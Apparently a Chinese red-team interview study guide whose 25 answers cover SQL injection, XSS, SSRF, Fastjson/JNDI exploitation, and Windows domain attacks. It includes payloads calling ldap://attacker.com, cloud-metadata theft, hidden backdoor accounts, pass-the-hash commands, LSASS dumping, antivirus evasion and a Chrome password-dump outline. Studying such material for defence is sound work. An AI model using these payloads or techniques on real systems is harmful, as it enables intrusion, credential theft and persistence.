站长素材音效下载,望城网站建设,wordpress情侣博客模板下载,台州华燕网业有限公司安全领域各种资源#xff0c;学习文档#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具#xff0c;欢迎关注。
目录 红队攻防工程师
1. SQL注入的报错函数
2. DOM型XSS
3. SSRF利用点
4. SQL注入点空表利用
5. MVC代码审计…安全领域各种资源学习文档以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具欢迎关注。
目录 红队攻防工程师
1. SQL注入的报错函数
2. DOM型XSS
3. SSRF利用点
4. SQL注入点空表利用
5. MVC代码审计流程
6. 挖洞实战案例
7. Redis利用姿势及环境差异
8. Fastjson回显
9. JNDI注入及原理
10. 端口389
11. Java回显技术
12. 泛微OA XStream回显差异
13. Shiro限制Payload长度
14. 文件上传白名单绕过
15. 00截断原理
16. 判断域控的几种方式
17. 工作组横向 vs 域内横向
18. Windows认证协议
19. 判断是否在域内
20. Hash传递原理
21. 权限维持技术
22. 横向移动姿势及原理
23. 凭证获取与对抗
24. 对抗杀软添加后门用户
25. Chrome密码Dump原理与工具思路 红队攻防工程师 sql注入的报错函数
dom 型 xss
ssrf 利用点
sql注入点空表如何利用
mvc代码审计流程
看你简历有在挖洞说一下你挖过的洞
Redis 利用姿势及环境差异
fastjson回显
jndi注入及原理
端口 389
Java 回显
泛微oa xstream的回显(jdk1.8和1.7的差异)
shiro 限制payload长度
Java回显的通用思路以及不同版本jdk的差异
文件上传白名单利用
00截断的原理
判断域控的几种方式
工作组横向
域内横向
Windows认证协议
白银票据黄金票据
判断是否在域内
hash传递原理
权限维持
横向移动的各种姿势及原理
凭证获取(姿势/常用/原理/对抗)
如何对抗杀软加后门用户
Chrome dump密码的原理如果让你写个工具思路是什么(或者别人工具的实现原理) 1. SQL注入的报错函数 核心函数 MySQLupdatexml(1,concat(0x7e,user()),1)、extractvalue(1,concat(0x7e,user()))MSSQLconvert(int,version)触发类型错误Oraclectxsys.drithsx.sn(1,(select user from dual)) 原理通过构造语法错误使数据库返回错误信息中包含敏感数据。 2. DOM型XSS 触发场景前端直接操作DOM未过滤用户输入如 javascriptdocument.write(location.hash.substring(1)); // 攻击者通过#svg onloadalert(1)触发 特点仅客户端执行无需服务器响应常见于SPA单页应用。 3. SSRF利用点 协议利用 file:///etc/passwd 读取本地文件dict://127.0.0.1:6379/info 探测Redis信息gopher:// 构造HTTP请求攻击内网服务 云元数据http://169.254.169.254/latest/meta-data/AWS密钥泄露。 4. SQL注入点空表利用 方法通过虚拟数据触发报错如 sqlUNION SELECT 1,(SELECT 1 FROM dual WHERE 1cast((SELECT version()) AS INT)),3 原理强制类型转换失败导致错误信息泄漏数据。 5. MVC代码审计流程 路由分析检查URL映射如Spring的RequestMapping是否存在未授权访问。控制器校验验证PreAuthorize等权限控制是否缺失。模型层SQL检查ORM框架MyBatis/Hibernate是否存在动态拼接。视图层XSS模板引擎Thymeleaf/JSP是否转义用户输入。第三方组件Fastjson/Shiro等版本是否存在已知漏洞。 6. 挖洞实战案例 逻辑漏洞某系统支付流程未校验订单归属导致越权支付。未授权访问API接口/api/admin/list无Token验证直接获取敏感数据。SQL注入搜索框参数keyword未过滤利用 AND 1updatexml(...) --获取管理员密码。 7. Redis利用姿势及环境差异 环境利用方式Linux写SSH公钥config set dir /root/.sshWindows写启动项C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil.bat 通用主从复制RCESLAVEOF指向恶意服务器 8. Fastjson回显 低版本≤1.2.24直接JNDI注入如{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:ldap://attacker.com/exp} 。高版本利用BasicDataSource构造内存马通过ClassLoader加载恶意类。 9. JNDI注入及原理 原理JNDI动态加载远程对象攻击者控制lookup()参数指向恶意RMI/LDAP服务触发远程类加载。利用链InitialContext.lookup(ldap://attacker.com/Exploit) → 加载恶意类执行RCE。 10. 端口389 用途LDAP协议默认端口用于域环境中的用户认证和目录服务。关联攻击域渗透中通过LDAP查询域用户、计算机等信息。 11. Java回显技术 通用思路 通过当前请求线程获取Response对象直接写入结果。反射调用ServletContext或HttpServletResponse输出数据。 JDK差异 JDK≤7直接使用TemplatesImpl加载字节码。JDK≥8需结合JNDI或内存马绕过限制。 12. 泛微OA XStream回显差异 JDK1.7利用java.beans.EventHandler 链直接执行命令。JDK1.8需通过TemplatesImpl加载字节码结合反射输出结果到响应流。 13. Shiro限制Payload长度 绕过方法 使用短链如CC链的简化版。分块传输rememberMepayload1; rememberMepayload2。结合内存马如注册Filter。 14. 文件上传白名单绕过 技巧 扩展名混淆.php→.php5、.phtml、.phar。.htaccess设置AddType application/x-httpd-php .jpg。内容伪造图片马修改Content-Type为image/jpeg。 15. 00截断原理 场景旧版PHP5.3.4处理文件名时遇到%00会截断后续字符。利用evil.php%00.jpg→ 服务器解析为evil.php 前提是magic_quotes_gpcOff。 16. 判断域控的几种方式 命令nltest /dclist:域名。DNS查询nslookup -typesrv _ldap._tcp.dc._msdcs. 域名。注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History中的DC信息。 17. 工作组横向 vs 域内横向 场景技术工作组IPC$共享、WMI命令、PsExec、SMB协议传递。域内Kerberos票据传递黄金/白银票据、LDAP查询、GPO组策略下发。 18. Windows认证协议 NTLM基于挑战-响应易受中间人攻击Responder工具。Kerberos基于票据TGT/ST黄金票据伪造TGT需krbtgt哈希白银票据伪造ST需服务账户哈希。 19. 判断是否在域内 命令systeminfo | findstr /i Domain。注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain。环境变量echo %USERDOMAIN%。 20. Hash传递原理 本质使用NTLM哈希代替明文密码进行身份验证Pass-the-Hash。工具Mimikatz的sekurlsa::pth或Impacket的psexec.py -hashes LMHASH:NTHASH。 21. 权限维持技术 系统级 隐藏账户net user test$ Password123 /add。计划任务schtasks /create /tn Update /tr evil.exe /sc hourly。 域控级 DSRM密码同步修改域控DSRM密码为已知值。Hook PasswordChangeNotify截取密码修改事件。 22. 横向移动姿势及原理 Pass-the-Hash直接使用哈希认证NTLM协议。Overpass-the-Hash将哈希转为Kerberos票据需域账户权限。DCOM/WMI远程执行命令如Get-WmiObject调用Win32_Process。 23. 凭证获取与对抗 常用工具 Mimikatz提取LSASS内存。Procdump导出进程内存离线解析。 对抗杀软 使用C#版Mimikatz避免特征检测。注册表注入无文件加载如reg addrundll32.exe 。 24. 对抗杀软添加后门用户 隐藏用户net user test$ Password123 /add /domain$符号隐藏。注册表克隆复制管理员RID至隐藏账户HKLM\SAM\SAM\Domains\Account\Users。无文件启动通过服务DLL或WMI订阅执行。 25. Chrome密码Dump原理与工具思路 原理 定位%LocalAppData%\Google\Chrome\User Data\Default\Login Data。解密密码字段调用CryptUnprotectData API需用户登录状态。 工具实现 Python脚本复制数据库文件→SQLite读取→调用Windows API解密。关键代码使用pywin32库的win32crypt.CryptUnprotectData()。